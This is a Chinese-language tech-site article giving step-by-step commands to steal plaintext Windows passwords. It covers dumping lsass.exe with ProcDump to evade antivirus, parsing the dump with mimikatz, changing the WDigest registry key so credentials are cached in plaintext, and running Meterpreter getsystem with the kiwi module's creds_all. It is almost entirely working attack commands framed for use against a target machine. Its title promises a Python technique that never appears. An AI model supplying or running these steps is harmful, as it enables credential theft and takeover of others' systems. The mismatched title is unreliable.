首頁 > 軟體

python簡單直接獲取windows明文密碼操作技巧

2021-10-14 19:00:18

01、Procdump+Mimikatz

利用procdump+Mimikatz 繞過殺軟獲取Windows明文密碼。

(1)工具準備:

ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

mimikatz:

https://github.com/gentilkiwi/mimikatz/

(2)Windows Server 2008 R2提取明文密碼

在目標機器上生成儲存檔案:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

將lsass.dmp複製到本地,使用mimikatz 一行命令將結果輸出到文字。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如圖:成功從記憶體中提取明文密碼。

02、Window 2012 R2抓取密碼

在Windows2012系統及以上的系統,預設在記憶體快取中禁止儲存明文密碼的。攻擊者可以通過修改登入檔的方式抓取明文,需要使用者重新登入後才能成功抓取。

(1)修改登入檔

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

(2)使用者administrator登出後重新登入,成功抓取到明文資訊。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模組

使用kiwi模組需要system許可權,所以我們在使用該模組之前需要將當前MSF中的shell提升為system。

提到system有兩個方法,一是當前的許可權是administrator使用者,二是利用其它手段先提權到administrator使用者。然後administrator使用者可以直接getsystem到system許可權。

meterpreter > getuid
Server username: BYPASS-E97BA3FCAdministrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM

載入kiwi模組:

load kiwi

列舉系統中的明文密碼:

creds_all

以上就是python簡單直接獲取windows明文密碼操作技巧的詳細內容,更多關於python獲取windows明文密碼的資料請關注it145.com其它相關文章!


IT145.com E-mail:sddin#qq.com